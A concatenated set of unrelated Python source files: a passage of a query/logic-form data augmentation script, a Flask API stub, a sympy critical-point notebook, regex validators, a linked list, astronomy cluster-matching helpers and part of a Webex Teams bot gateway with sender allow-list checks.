                        #field_corr_dict[field] = config.field2word[schema[i]]['value_range']
                        num_sample = 3
                        if len(field2word[schema[i]]['value_range']) < num_sample:
                            num_sample = len(field2word[schema[i]]['value_range'])
                        field_corr_dict[field] = random.sample(field2word[schema[i]]['value_range'], num_sample)
                    elif value_type == 'int':
                        field_corr_dict[field] = random.sample(range(1, 10), 3)
                    elif value_type == 'date':
                        field_corr_dict[field] = [2004, 2007, 2010]
                    elif value_type == 'time':
                        field_corr_dict[field] = ['10am', '3pm', '5pm', '1pm']
                    elif value_type == 'month':
                        field_corr_dict[field] = ['jan_2nd', 'jan_3rd', 'feb_3rd']
                    elif value_type == 'bool':
                        field_corr_dict[field] = [] #'true'
            field_corr_dicts.append(field_corr_dict)
        # print field_corr_dicts
        # now the list of dicts [{str_field1:[], str_field2:[], ...}, {int_field1:[], int_field2:[], ...}]
        # Step 2.2: Regenerate sentence by filling into the place
        field_combinations = generateFieldCombs(field_corr_dicts)
        for field_combination in field_combinations:
            print field_combination
            newquery = [x for x in query]
            newlogic = [x for x in logic]
            # regenerate query, lower case or query_word
            for (posit, idx) in qu_field:
                field_info = field2word[field_combination[idx]]
                if len(field_info['query_word']) > 1:
                    # Sentence-initial slots prefer wh-words; elsewhere
                    # 'who'/'when'/'city' are re-rolled away.
                    if posit == 0 and 'who' in field_info['query_word']:
                        pick = 'who'
                    elif posit == 0 and 'when' in field_info['query_word']:
                        pick = 'when'
                    else:
                        pick = random.choice(field_info['query_word'])
                        while pick == 'who' or pick == 'when' or pick == 'city':
                            pick = random.choice(field_info['query_word'])
                    newquery[posit] = pick
                else:
                    newquery[posit] = field_combination[idx].lower()
            # regenerate logic forms
            for (posit, idx) in lo_field:
                newlogic[posit] = field_combination[idx]
            if len(qu_value) > 0:
                value_combinations = generateValueCombs(field_corr_dicts, field_combination, qu_value)
                for value_combination in value_combinations:
                    morequery = [x for x in newquery]
                    morelogic = [x for x in newlogic]
                    for i in range(len(qu_value)):
                        morequery[qu_value[i][0]] = str(value_combination[i]).lower()
                    for i in range(len(qu_value)):
                        morelogic[lo_value[i][0]] = str(value_combination[i])
                    queryCollect.append(' '.join(morequery))
                    # Drop a just-added query that duplicates an earlier one.
                    if isRepetitive(queryCollect):
                        del queryCollect[-1]
                        continue
                    logicCollect.append(' '.join(morelogic))
                    fieldCollect.append(' '.join(schema_aug[j]))
                    # newly added for true
                    logicCollect[-1] = logicCollect[-1].replace('<value>:1','true')
                    logicCollect[-1] = logicCollect[-1].replace('<value>:2','true')
                # Values handled above; skip the value-free path below.
                continue
            queryCollect.append(' '.join(newquery))
            # newly added for <count>
            fillin = random.sample(['2','3','two','three'], 1)[0]
            queryCollect[-1] = queryCollect[-1].replace('<count>',fillin)
            if isRepetitive(queryCollect):
                del queryCollect[-1]
                continue
            logicCollect.append(' '.join(newlogic))
            fieldCollect.append(' '.join(schema_aug[j]))
            logicCollect[-1] = logicCollect[-1].replace('<count>',fillin)
            # newly added for true
            logicCollect[-1] = logicCollect[-1].replace('<value>:1','true')
            logicCollect[-1] = logicCollect[-1].replace('<value>:2','true')
    return queryCollect, logicCollect, fieldCollect
def main(parser, field2word, field2word_tag, collect, logic, schema):
    ''' for certain logic form, we have lines from collect files
    return --- queryCollect, logicCollect, fieldCollect

    parser -- Stanford parser instance used by the tagger.
    collect -- example query lines for this logic template; blanks skipped.
    '''
    queryCollect, logicCollect, fieldCollect = [], [], []
    for query in collect:
        # for each line, we parse the query, schema
        if query == '':
            continue
        print '*** New query ***'
        print query
        #tagging using tag_util's dict
        tagged2, field_corr, value_corr, quTemp, _ = \
            tg.sentTagging_treeON(parser, field2word_tag, query, ' '.join(schema))
        #converting to field_type_corr
        # Map each tagged field name to its value type (e.g. 'string').
        field_corr_old = field_corr.split()
        field_corr_new = ['' for x in field_corr_old]
        for i in range(len(field_corr_old)):
            field_type = field2word[field_corr_old[i]]['value_type']
            field_corr_new[i] = field_type
        schema_aug = [schema]
        #augmenting
        queryOne, logicOne, fieldOne = augment(field2word, quTemp, logic, field_corr_new, schema_aug)
        #extending collections
        queryCollect.extend(queryOne)
        logicCollect.extend(logicOne)
        fieldCollect.extend(fieldOne)
    return queryCollect, logicCollect, fieldCollect
# from less to more, equal to neq, argmax to argmin
def expandDatasets(queryCollect, logicCollect, schemaCollect):
    """Randomly paraphrase each (query, logic) pair to expand the dataset.

    For each entry, one surface pattern is matched (e.g. 'no more',
    'less than', 'max ') and a random rewrite is applied; the logic
    operator is rewritten to match (' ng ' <-> ' nl ', 'less' <->
    'greater'/'nl'/'ng', 'max ' <-> 'min ', 'neq' <-> 'equal').
    Output lists stay index-aligned with each other.
    """
    newqueryCollect, newlogicCollect, newschemaCollect = [], [], []
    for i in range(len(queryCollect)):
        query, logic, schema = copy.copy(queryCollect[i]), copy.copy(logicCollect[i]), copy.copy(schemaCollect[i])
        ## ng, no more
        if logic.find(' ng ')!= -1 and query.find('no more')!= -1:
            # One draw picks among 4 rewrite families (keep / nl / greater
            # / less), a second draw picks the wording.
            sample = np.random.rand()
            if sample >= 0.75:
                # stay
                if np.random.rand() >= 0.5:
                    query = query.replace('no more', 'not more')
            elif sample >= 0.5 and sample < 0.75:
                # to less
                logic = logic.replace(' ng ', ' nl ')
                if np.random.rand() >= 0.5:
                    query = query.replace('no more', 'not less')
                else:
                    query = query.replace('no more', 'no less')
            elif sample >= 0.25 and sample < 0.5:
                # to less
                logic = logic.replace(' ng ', ' greater ')
                if np.random.rand() >= 0.5:
                    query = query.replace('no more', 'more')
                else:
                    query = query.replace('no more', 'higher')
            else:
                # to less
                logic = logic.replace(' ng ', ' less ')
                if np.random.rand() >= 0.5:
                    query = query.replace('no more', 'less')
                else:
                    query = query.replace('no more', 'fewer')
            newqueryCollect.append(query)
            newlogicCollect.append(logic)
            newschemaCollect.append(schema)
            continue
        ## ng, or less
        if logic.find(' ng ')!= -1 and query.find('or less')!= -1:
            # Half the time flip the comparison direction entirely.
            if np.random.rand() >= 0.5:
                query = query.replace('or less', 'or more')
                logic = logic.replace(' ng ', ' nl ')
            newqueryCollect.append(query)
            newlogicCollect.append(logic)
            newschemaCollect.append(schema)
            continue
        ## ng, or lower
        if logic.find(' ng ')!= -1 and query.find('or lower')!= -1:
            if np.random.rand() >= 0.5:
                query = query.replace('or lower', 'or higher')
                logic = logic.replace(' ng ', ' nl ')
            newqueryCollect.append(query)
            newlogicCollect.append(logic)
            newschemaCollect.append(schema)
            continue
        ## ng, or fewer
        if logic.find(' ng ')!= -1 and query.find('or fewer')!= -1:
            if np.random.rand() >= 0.5:
                query = query.replace('or fewer', 'or more')
                logic = logic.replace(' ng ', ' nl ')
            newqueryCollect.append(query)
            newlogicCollect.append(logic)
            newschemaCollect.append(schema)
            continue
        ## ng, or bigger
        if logic.find(' ng ')!= -1 and query.find('or bigger')!= -1:
            if np.random.rand() >= 0.5:
                query = query.replace('or bigger', 'or smaller')
                logic = logic.replace(' ng ', ' nl ')
            newqueryCollect.append(query)
            newlogicCollect.append(logic)
            newschemaCollect.append(schema)
            continue
        ## ng, maximum
        if logic.find(' ng ')!= -1 and query.find('maximum')!= -1:
            if np.random.rand() >= 0.5:
                query = query.replace('maximum', 'minimum')
                logic = logic.replace(' ng ', ' nl ')
            newqueryCollect.append(query)
            newlogicCollect.append(logic)
            newschemaCollect.append(schema)
            continue
        # less, less than
        if logic.find('less')!= -1 and query.find('less than')!= -1:
            sample = np.random.rand()
            if sample >= 0.75:
                # stay
                if np.random.rand() >= 0.5:
                    query = query.replace('less than', 'fewer than')
            elif sample >= 0.5 and sample < 0.75:
                # to less
                logic = logic.replace('less', 'greater')
                if np.random.rand() >= 0.5:
                    query = query.replace('less than', 'more than')
                else:
                    query = query.replace('less than', 'larger than')
            elif sample >= 0.25 and sample < 0.5:
                # to less
                logic = logic.replace('less', 'nl')
                if np.random.rand() >= 0.6:
                    query = query.replace('less than', 'no less than')
                # NOTE(review): this condition draws rand() twice, so it is
                # not the complement of the branch above — confirm intent.
                elif np.random.rand() >= 0.3 and np.random.rand() < 0.6:
                    query = query.replace('less than', 'at least')
                else:
                    query = query.replace('less than', 'equal or more than')
            else:
                # to less
                logic = logic.replace('less', 'ng')
                if np.random.rand() >= 0.6:
                    query = query.replace('less than', 'no more than')
                # NOTE(review): double rand() draw here too — see above.
                elif np.random.rand() >= 0.3 and np.random.rand() < 0.6:
                    query = query.replace('less than', 'at most')
                else:
                    query = query.replace('less than', 'equal or less than')
            newqueryCollect.append(query)
            newlogicCollect.append(logic)
            newschemaCollect.append(schema)
            continue
        # less, lower
        if logic.find('less')!= -1 and query.find('lower')!= -1:
            if np.random.rand() >= 0.5:
                query = query.replace('lower', 'higher')
                logic = logic.replace('less', 'greater')
            newqueryCollect.append(query)
            newlogicCollect.append(logic)
            newschemaCollect.append(schema)
            continue
        # less, smaller
        if logic.find('less')!= -1 and query.find('smaller')!= -1:
            if np.random.rand() >= 0.5:
                query = query.replace('smaller', 'bigger')
                logic = logic.replace('less', 'greater')
            newqueryCollect.append(query)
            newlogicCollect.append(logic)
            newschemaCollect.append(schema)
            continue
        ### If in time-domain
        # Less
        if logic.find('less')!= -1 and query.find('before')!= -1:
            if np.random.rand() >= 0.5:
                query = query.replace('before', 'after')
                logic = logic.replace('less', 'greater')
            newqueryCollect.append(query)
            newlogicCollect.append(logic)
            newschemaCollect.append(schema)
            continue
        if logic.find('less')!= -1 and (query.find('earlier')!= -1 or query.find('shorter')!= -1 \
            or query.find('sooner')!= -1):
            if np.random.rand() >= 0.5:
                # Replace whichever temporal comparative is present with
                # one randomly chosen opposite.
                oppo = random.choice(['later','greater','longer'])
                query = query.replace('earlier', oppo)
                query = query.replace('shorter', oppo)
                query = query.replace('sooner', oppo)
                logic = logic.replace('less', 'greater')
            newqueryCollect.append(query)
            newlogicCollect.append(logic)
            newschemaCollect.append(schema)
            continue
        # Ng
        if logic.find(' ng ')!= -1 and (query.find('no later')!= -1 or query.find('no longer')!= -1):
            if np.random.rand() >= 0.5:
                query = query.replace('no later', 'no earlier')
                query = query.replace('no longer', 'no earlier')
                logic = logic.replace(' ng ', ' nl ')
            newqueryCollect.append(query)
            newlogicCollect.append(logic)
            newschemaCollect.append(schema)
            continue
        if logic.find(' ng ')!= -1 and (query.find('or earlier')!= -1 or query.find('or shorter')!= -1 \
            or query.find('or before')!= -1):
            if np.random.rand() >= 0.5:
                oppo = random.choice(['or later','or after','or longer'])
                query = query.replace('or earlier', oppo)
                query = query.replace('or shorter', oppo)
                query = query.replace('or before', oppo)
                logic = logic.replace(' ng ', ' nl ')
            newqueryCollect.append(query)
            newlogicCollect.append(logic)
            newschemaCollect.append(schema)
            continue
        if logic.find(' ng ')!= -1 and (query.find('at most')!= -1 or query.find('at latest')!= -1):
            if np.random.rand() >= 0.5:
                oppo = random.choice(['at least','at earliest'])
                query = query.replace('at most', oppo)
                query = query.replace('at latest', oppo)
                logic = logic.replace(' ng ', ' nl ')
            newqueryCollect.append(query)
            newlogicCollect.append(logic)
            newschemaCollect.append(schema)
            continue
        # max, min
        if logic.find('max ')!= -1:
            # Keep the original pair, then add min/paraphrase variants.
            newqueryCollect.append(query)
            newlogicCollect.append(logic)
            newschemaCollect.append(schema)
            if query.find('most') != -1:
                newqueryCollect.append(query.replace('most', 'least'))
                newlogicCollect.append(logic.replace('max ', 'min '))
                newschemaCollect.append(schema)
                if logic.find('count') != -1:
                    # count-based max/min: no further paraphrases.
                    continue
                if np.random.rand() >= 0.5:
                    # maximum
                    newqueryCollect.append(query.replace('most', 'maximum'))
                    newlogicCollect.append(logic)
                    newschemaCollect.append(schema)
                else:
                    # highest
                    newqueryCollect.append(query.replace('most', 'highest'))
                    newlogicCollect.append(logic)
                    newschemaCollect.append(schema)
                if np.random.rand() >= 0.5:
                    # minimum
                    newqueryCollect.append(query.replace('most', 'minimum'))
                    newlogicCollect.append(logic.replace('max ', 'min '))
                    newschemaCollect.append(schema)
                else:
                    # smallest
                    newqueryCollect.append(query.replace('most', 'least'))
                    newlogicCollect.append(logic.replace('max ', 'min '))
                    newschemaCollect.append(schema)
            if query.find('latest') != -1:
                newqueryCollect.append(query.replace('latest', 'earliest'))
                newlogicCollect.append(logic.replace('max ', 'min '))
                newschemaCollect.append(schema)
            if query.find('longest') != -1:
                newqueryCollect.append(query.replace('longest', 'shortest'))
                newlogicCollect.append(logic.replace('max ', 'min '))
                newschemaCollect.append(schema)
            continue
        # non-equal to equal
        if logic.find('neq')!= -1 and query.find(' not ') != -1:
            # neq
            newqueryCollect.append(query)
            newlogicCollect.append(logic)
            newschemaCollect.append(schema)
            # equal
            newqueryCollect.append(query.replace(' not ', ' '))
            newlogicCollect.append(logic.replace('neq', 'equal'))
            newschemaCollect.append(schema)
            continue
        # No pattern matched: keep the pair unchanged.
        newqueryCollect.append(query)
        newlogicCollect.append(logic)
        newschemaCollect.append(schema)
    return newqueryCollect, newlogicCollect, newschemaCollect
def TD_Augmenting(TD, configdict):
    """Build an augmented (query, logic, schema) test dataset from TD.

    For every logic form in TD['examples'], run the per-example pipeline
    (Stanford parse -> main -> expandDatasets) and concatenate the results.

    Returns:
        (queries, logics, schemas): three parallel lists.
    """
    parser = stanford.StanfordParser(
        model_path='/Users/richard_xiong/Documents/DeepLearningMaster/deep_parser/englishPCFG.ser.gz')
    all_queries, all_logics, all_schemas = [], [], []
    for lo, collect in TD['examples'].items():
        tiny_q, tiny_l, tiny_s = main(parser, TD['schema'], configdict,
                                      collect, lo, TD['schema'].keys())
        expa_q, expa_l, expa_s = expandDatasets(tiny_q, tiny_l, tiny_s)
        all_queries.extend(expa_q)
        all_logics.extend(expa_l)
        all_schemas.extend(expa_s)
    return all_queries, all_logics, all_schemas
__author__ = "Sean D'Rosario"
"""
Submission for HW 10 for DS-GA-1007
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import Assignment10 as a10
class Assignment10mainclass:
    """Entry-point wrapper for the Assignment 10 submission."""

    @staticmethod
    def run():
        """Load the data and run the assignment's main routine."""
        a10.read_data()
        a10.main()


# Bug fix: the __main__ guard used to live INSIDE the class body, where it
# executed at class-definition time (i.e. on import-as-script, during class
# creation). A module-level guard is the conventional, predictable form.
if __name__ == '__main__':
    Assignment10mainclass.run()
|
#!flask/bin/python
from flask import Flask, jsonify
from flask import request
from flask import abort
from flask import make_response
import false_packer
import json
# Single Flask application instance for the packer-faker API.
app = Flask(__name__)
@app.route('/packer_faker/api/v1.0/pack_asin', methods=['OPTIONS'])
def option_interceptor():
    """Answer CORS preflight (OPTIONS) requests for the pack_asin endpoint."""
    resp = make_response()
    cors_headers = (
        ("Access-Control-Allow-Origin", "*"),
        ('Access-Control-Allow-Methods', 'POST, GET, OPTIONS'),
        ('Access-Control-Allow-Headers', 'origin, x-csrftoken, content-type, accept'),
    )
    for header_name, header_value in cors_headers:
        resp.headers[header_name] = header_value
    return resp, 201
@app.route('/packer_faker/api/v1.0/pack_asin', methods=['POST'])
def pack_asin():
    """Run the fake packer on the posted JSON and return its result.

    Rejects requests without a JSON body (400); responses carry permissive
    CORS headers and status 201.
    """
    if not request.json:
        abort(400)
    packed = false_packer.pack_fake(json.dumps(request.json))
    resp = make_response(jsonify(packed))
    for header_name, header_value in (
        ("Access-Control-Allow-Origin", "*"),
        ('Access-Control-Allow-Methods', 'POST, GET, OPTIONS'),
        ('Access-Control-Allow-Headers', 'origin, x-csrftoken, content-type, accept'),
    ):
        resp.headers[header_name] = header_value
    return resp, 201
if __name__ == '__main__':
    # NOTE(review): debug=True enables the interactive Werkzeug debugger,
    # which allows arbitrary code execution — do not expose it on a
    # network-reachable address like this outside of development.
    app.run(debug=True, host="10.48.129.192", port = 5001)
|
# In this notebook we use symbolic calculation to find all critical points of
# a function and the eigenvalues of its Hessian at each one, which tells us
# whether each critical point is a maximum, minimum, or saddle.
import sympy as sy
import plotly.graph_objs as go  # NOTE(review): imported but never used below

x,y = sy.symbols('x y')
sy.init_printing(use_unicode=True)
#%% Define Function
f = x**4+y**2-x*y # function 2 from Stanford
#f = 4*x + 2*y - x**2 -3*y**2
f  # bare expression: notebook-style display of the function
# First-order partial derivatives; critical points are where both vanish.
df_dy = sy.diff(f,y)
df_dx = sy.diff(f,x)
df_dx  # notebook display
#%% Find critical points
cr =sy.nonlinsolve([df_dx,df_dy],[x,y])
print('critical points',cr)
cr  # notebook display
#%% build hessian
e = sy.hessian(f,[x,y])
e  # notebook display
#%% Find eigenvalues for each of the critical points
for c in cr :
    xv = c[0]
    yv = c[1]
    print('Critical point : \n\tx : {} \n\ty : {}'.format(xv.evalf(),yv.evalf()))
    # Substitute the critical point into the Hessian and take its eigenvalues.
    eigs = list(e.subs({x:xv,y:yv}).eigenvals().keys())
    # NOTE(review): these comparisons assume the eigenvalues are real numeric
    # sympy objects; symbolic/complex eigenvalues would raise here.
    if eigs[0] > 0 and eigs[1] > 0 :
        print('Concave up')
    elif eigs[0] < 0 and eigs[1] < 0 :
        print('Concave down')
    else :
        print('Saddle Point')
    print('Eigen Values : ',eigs)
|
import re
def phoneNumberValidator(number):
    """Validate an Indian mobile number.

    Accepted forms: a bare 10-digit number starting 6-9, the same with a
    leading 0, or the same with a leading +91. Returns True/False.
    """
    pattern = '^[6-9][0-9]{9}$|^[0][6-9][0-9]{9}$|^[+][9][1][6-9][0-9]{9}$'
    return re.match(pattern, str(number)) is not None
def emailValidator(email):
    """Validate an email address of the form local@domain.tld.

    Rules (unchanged from the original intent):
      - local part: 5-19 chars of lowercase alphanumerics plus '_' and '.',
        starting with an alphanumeric
      - domain: 3-8 lowercase alphanumerics
      - TLD: 2-4 lowercase letters
    Returns True/False.
    """
    # Bug fix: the dot before the TLD was unescaped, so it matched ANY
    # character (e.g. 'abcde@gmailxcom' validated). Escape it and use a
    # raw string for the pattern.
    pattern = r'^[0-9a-z][0-9a-z_.]{4,18}@[0-9a-z]{3,8}\.[a-z]{2,4}$'
    return re.match(pattern, str(email)) is not None
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 7 16:50:16 2019
@author: HP
"""
class Node:
    """A singly linked list node."""

    def __init__(self, data):
        self.key = data   # payload stored in this node
        self.next = None  # following node, or None at the tail
class LinkedList:
    """Singly linked list with O(1) push-front and pop-front."""

    def __init__(self):
        self.head = None  # first node, or None when empty
        self.tail = None  # last node, or None when empty

    def push(self, data):
        """Insert *data* at the front of the list."""
        new_node = Node(data)
        new_node.next = self.head
        self.head = new_node
        if self.tail is None:
            self.tail = self.head

    def pop(self):
        """Remove the front node, if any.

        Bug fix: also reset ``tail`` when the last node is removed, so it
        never keeps pointing at a node that is no longer in the list.
        """
        if self.head is not None:
            self.head = self.head.next
            if self.head is None:
                self.tail = None

    def prnt(self, node):
        """Print every key from *node* to the end of the list."""
        while node is not None:
            print(node.key)
            node = node.next
# Demo: build a list, drop the newest element, and show the contents.
# Fix: the variable was named 'list', shadowing the builtin.
lst = LinkedList()
lst.push(5)
lst.push(10)
lst.push(9)
lst.push(13)
lst.pop()
lst.prnt(lst.head)
print(lst.head.key, lst.tail.key)
import healpy as hp
import healsparse as hsp
import numpy as np
from scipy.spatial import cKDTree
import astropy.io.fits as pyfits
from astropy.coordinates import SkyCoord
from astropy.cosmology import FlatwCDM
# Flat wCDM cosmology used for distance conversions (H0=70 km/s/Mpc, Om0=0.3).
cosmo = FlatwCDM(H0=70, Om0=0.3)
def footprint_check(mask_file, ra, dec):
    """Return indices of (ra, dec) [deg] positions that land on mask pixels.

    The HEALPix pixel of every position is matched against the mask table's
    HPIX entries with a cKDTree nearest-neighbour lookup; indices returned
    point into the input position arrays.
    NOTE(review): FRACGOOD is carried as a second tree coordinate but, with
    the Manhattan metric (p=1) and the 0.05 distance cut, it effectively
    constrains the match too — confirm this weighting is intended.
    """
    # FITS extension 1: table with (at least) HPIX and FRACGOOD columns.
    masks=pyfits.open(mask_file)[1].data
    nside = 4096  # HEALPix resolution of the mask
    # Degrees -> spherical polar angles expected by ang2pix.
    theta = (90.0 - dec)*np.pi/180.
    phi = ra*np.pi/180.
    pix_acts=hp.ang2pix(nside, theta, phi)
    # (pixel, 1) pairs mirroring the (HPIX, FRACGOOD) layout used below.
    pixels_acts= np.array([pix_acts, np.ones(len(pix_acts))]).transpose()
    # Restrict the mask to the pixel range spanned by the positions.
    masks=masks[ np.where( (masks['HPIX'] >= np.min(pix_acts)) & (masks['HPIX'] <= np.max(pix_acts)) )]
    pixels= np.array([masks['HPIX'], masks['FRACGOOD']]).transpose()
    # Tree over the positions' pixels, queried with the mask pixels.
    tree=cKDTree(pixels_acts)
    dis, inds = tree.query(pixels , k=1, p=1)
    # Keep positions whose pixel (and fracgood~1) matches a mask row.
    ind_keep=inds[np.where(dis < 0.05)]
    return ind_keep
def footprint_check_python(mask_file, ra, dec):
    """Indices of (ra, dec) positions whose HealSparse fracgood > 0.95."""
    sparse_map = hsp.HealSparseMap.read(mask_file)
    map_values = sparse_map.get_values_pos(ra, dec, lonlat=True)
    return np.where(map_values['fracgood'] > 0.95)
def footprint_check_python_zmax(mask_file, ra, dec, zs):
    """Indices of positions with fracgood > 0.95 and map zmax above zs."""
    sparse_map = hsp.HealSparseMap.read(mask_file)
    map_values = sparse_map.get_values_pos(ra, dec, lonlat=True)
    well_covered = map_values['fracgood'] > 0.95
    deep_enough = map_values['zmax'] > zs
    return np.where(well_covered & deep_enough)
def match_ACT_to_redmapper(act_ra, act_dec, clusters_ra, clusters_dec, dAs, z1, z2):
    """Match each ACT cluster to its nearest redMaPPer cluster on the sky.

    For every ACT position, angular separations to all redMaPPer clusters
    are converted to transverse distances via dAs (angular-diameter
    distances, presumably Mpc — TODO confirm units) and the nearest match
    within 1.5 of that unit is kept.
    NOTE(review): parameters z1 and z2 are unused.
    Returns (kept ACT indices, matching redMaPPer indices, match distances).
    """
    acts_coords=SkyCoord(act_ra, act_dec, frame='icrs', unit='deg')
    rdmp_coords=SkyCoord(clusters_ra, clusters_dec, frame='icrs', unit='deg')
    ind_acts = np.zeros(len(act_ra), dtype=np.int64)
    ind_rdmp = np.zeros(len(act_ra), dtype=np.int64)
    dis_acts_rp = np.zeros(len(act_ra))
    for ii in range(len(act_ra)):
        sep=rdmp_coords.separation(acts_coords[ii]).arcminute
        # arcminutes -> radians; multiplied by dAs below to get a distance.
        comp_dis = sep/60.0/180.0*np.pi #* dAs
        #comp_dis=cosmo.kpc_proper_per_arcmin(dAs).value * sep/1000.0
        # NOTE(review): dAs is indexed per-redMaPPer cluster here — confirm
        # its length matches clusters_ra rather than act_ra.
        ind_temp, =np.where(comp_dis*dAs < 1.)
        if (len(ind_temp)) > 1:
            print('More than one redmapper matches for RA %f DEC %f'%(act_ra[ii], act_dec[ii]))
        # Always keep the single angularly-closest cluster.
        dis_acts_rp_ind = np.argmin(comp_dis)
        ind_rdmp[ii]=dis_acts_rp_ind
        ind_acts[ii]=ii
        dis_acts_rp[ii] = comp_dis[dis_acts_rp_ind] * dAs[dis_acts_rp_ind]
    # Final cut on physical match distance.
    ind_keep, =np.where(dis_acts_rp < 1.5)
    return ind_keep, ind_rdmp[ind_keep], dis_acts_rp[ind_keep]
def est_centerfrac(dist):
    """Return the fraction of entries in *dist* that are below 0.05.

    Parameters
    ----------
    dist : array-like of float
        Match distances (same units as the 0.05 threshold).
    """
    dist = np.asarray(dist)
    close, = np.where(dist < 0.05)
    # Bug fix: np.float was deprecated in NumPy 1.20 and removed in 1.24;
    # the builtin float is the drop-in replacement.
    return float(len(close)) / float(len(dist))
|
"""
TECHX API GATEWAY
COMMUNICATION WITH WEBEX TEAMS
CREATED BY: FRBELLO AT CISCO DOT COM
DATE : JUL 2020
VERSION: 1.0
STATE: RC2
"""
__author__ = "Freddy Bello"
__author_email__ = "frbello@cisco.com"
__copyright__ = "Copyright (c) 2016-2020 Cisco and/or its affiliates."
__license__ = "MIT"
# ==== Libraries ====
import os
import logging
import yaml
from webexteamssdk import WebexTeamsAPI, WebhookEvent, ApiError
# ==== Custom APIGW Libraries ====
from apigw.apigw_dispatcher import APIGWDispatcher
from apigw.apigw_generic import webex_teams_enable
from apigw.apigw_misc import CovidStats
from apigw.apigw_card import meraki_form, simple_form
from apigw.apigw_meraki import APIGWMerakiWorker, meraki_api_enable
# ==== Create a Logger ======
# Module-level logger for all Webex Teams gateway traffic.
logger = logging.getLogger("apigw.WebexTeams")
def apigw_webex_listener(payload):
    """Handle a webhook callback from Webex Teams.

    payload: parsed JSON body of the webhook (dict).
    Returns a dict with 'status_code'/'status_info' (plus request details on
    success); every validation rejection uses status_code 400.
    """
    logger.info("Incoming Message from Webex Teams")
    # Validate if Callback is from a valid Webex Team Space
    #### BEST PRACTICE FOR Allow Only Traffic of Interest
    source_room = payload["data"]["roomId"]
    if not check_source_room(source_room):
        response = {"status_code": 400, "status_info": "No a Valid Room"}
        return response
    # Retrieve the person Email for Requestor Validation
    #### BEST PRACTICE FOR Allow Only Traffic of Interest
    requestor_email = payload["data"]["personEmail"]
    if not check_requestor_email(requestor_email):
        logger.info("Person is not allowed: %s ", requestor_email)
        response = {"status_code": 400, "status_info": "User is not in Allowance List"}
        return response
    logger.info("Person is in allowance list: %s ", requestor_email)
    # If Room is a valid source, then Instatiate the APIG Create all the Objects
    webex_bot = WebexTeamsAPI()
    webex_rx = WebhookEvent(payload)
    dispatcher = APIGWDispatcher(webex_bot)
    # Webex Teams API Objects
    in_room = webex_bot.rooms.get(webex_rx.data.roomId)
    in_msg = webex_bot.messages.get(webex_rx.data.id)
    in_person = webex_bot.people.get(in_msg.personId)
    requestor_name = in_person.displayName
    requestor_orgid = in_person.orgId
    my_own = webex_bot.people.me()
    out_msg = ""
    # Verify is message arrive from a valid Organization
    #### BEST PRACTICE FOR Allow Only Traffic of Interest
    if check_orgid_origin(requestor_orgid):
        logger.info("Organization is allowed")
    else:
        logger.info("Organization is not allowed")
        response = {"status_code": 400, "status_info": "Organization is not Allowed"}
        return response
    # Built the Actions Menu in the APIGWDispatcher
    logger.info("Preparing Actions Menu for APIGWDispatcher for Webex Teams Client for %s", requestor_name)
    if apigw_actions_builder(dispatcher, requestor_name):
        logger.info("Webex Teams Action Menu built sucessfully")
    else:
        logger.error(
            "Action Menu build fails, Default Action is the only opyion available"
        )
    # Start Processing
    response = {"status_code": 200, "status_info": "success"}
    if in_room.type == "direct":
        # 1:1 space: the whole message text is the command.
        order_intent = in_msg.text.rstrip()
    else:
        # Group space: drop the leading @bot mention token.
        input_str = in_msg.text.split(" ", 1)
        order_intent = input_str[1]
    try:
        if in_msg.personId == my_own.id:
            # Ignore our own messages to avoid a feedback loop.
            response = {"status_code": 400, "status_info": "Can't message myself"}
            return response
        out_msg = dispatcher.get_orders(order_intent, in_person, in_room)
        response = {
            "status_code": 200,
            "status_info": "success",
            "request": order_intent,
            "space": in_room.title,
        }
        logger.info(response)
    except ApiError as err:
        logger.error("Failure in procesing incoming message from Team : %s", err)
        out_msg = "**Unable to process the Message**"
        response = {"status_code": 400, "status_info": "error"}
    if apigw_send_message(webex_bot, in_room.id, out_msg):
        logger.info("Messsage Dispatched : %s", out_msg)
    else:
        logger.info("Messsage Delivery Failure")
    # Clean Objects
    del webex_bot
    del dispatcher
    del webex_rx
    logger.info("All Objects references has been cleared out")
    return response
# ====== Helpers Functions ==========
## ========= SECURITY CHECK FUNCTIONS ============
def check_source_room(room_id):
    """
    Helper Function to validate if Space is One:One or Group
    Return True/False
    """
    allowed_rooms = (
        str(os.environ["WEBEX_TEAMS_DIRECT_ROOM"]),
        str(os.environ["WEBEX_TEAMS_GROUP_ROOM"]),
    )
    return room_id in allowed_rooms
def check_orgid_origin(msg_orgid):
    """
    Check ORGID from the Job Requester from Webex
    receive REQ_ORGID
    return: True/False
    WEBEX BEST PRACTICE
    /blog/building-a-more-secure-bot
    """
    allowed_orgid = str(os.environ['WEBEX_ALLOWED_ORGANIZATION'])
    return allowed_orgid == msg_orgid
def check_requestor_email(person_email):
    """
    Check personEmail from the Job Requester from Webex
    receive personEmail from webhook message
    return: True/False
    WEBEX BEST PRACTICE
    /blog/building-a-more-secure-bot
    """
    comm_allowed = False
    # allowed_users.yaml is re-read on every request (picks up edits live).
    with open('allowed_users.yaml', 'r') as stream:
        data = yaml.safe_load(stream)
    # NOTE(review): this is a substring test against the stringified allow
    # list, so e.g. 'bob@x.com' also passes when 'bigbob@x.com' is listed —
    # consider an exact membership check against the list itself.
    if person_email in str(data["Allowed"]["email"]):
        comm_allowed = True
    return comm_allowed
### =================== END OF SECURITY ===============
## ====== General Purpose Functions ========
def get_health(message):
    """
    Simple Health Check
    params
        message: incoming message (any truthy value means the link works)
    return: human-readable health string
    """
    if not message:
        return " Webex Teams Comm is not working :("
    return "Webex Teams Comm is Working :) "
def apigw_send_message(webex_bot, room_id, message, card=None):
    """
    DRY for Message delivery.

    Sends *message* (markdown) to *room_id*; when *card* is given it is sent
    as an adaptive-card attachment with *message* as the plain-text fallback.
    Returns True on success, False when the Webex API raises ApiError.
    """
    delivery_status = False
    try:
        if card is None:
            webex_bot.messages.create(room_id, markdown=message)
        else:
            # Bug fix: the webexteamssdk keyword is 'attachments'; the old
            # misspelled 'atachments' meant the card was never delivered.
            webex_bot.messages.create(room_id, text=message, attachments=card)
        delivery_status = True
    except ApiError:
        delivery_status = False
    return delivery_status
def send_card(message):
    """Return the Meraki adaptive-card form (the message text is unused)."""
    return meraki_form
def simple_card(message):
    """Return the simple adaptive-card form (the message text is unused)."""
    return simple_form
# Generic Action Registrar
def apigw_actions_builder(dispatcher, requestor_name):
    """
    Create the Menu Actions based on Enabled Services
    params:
        dispatcher - APIGWDispatcher Object (the action registrar)
        requestor_name - Person sending the message
        Each action is registered as (action-word, helper-msg, command)
    return: True/False
    """
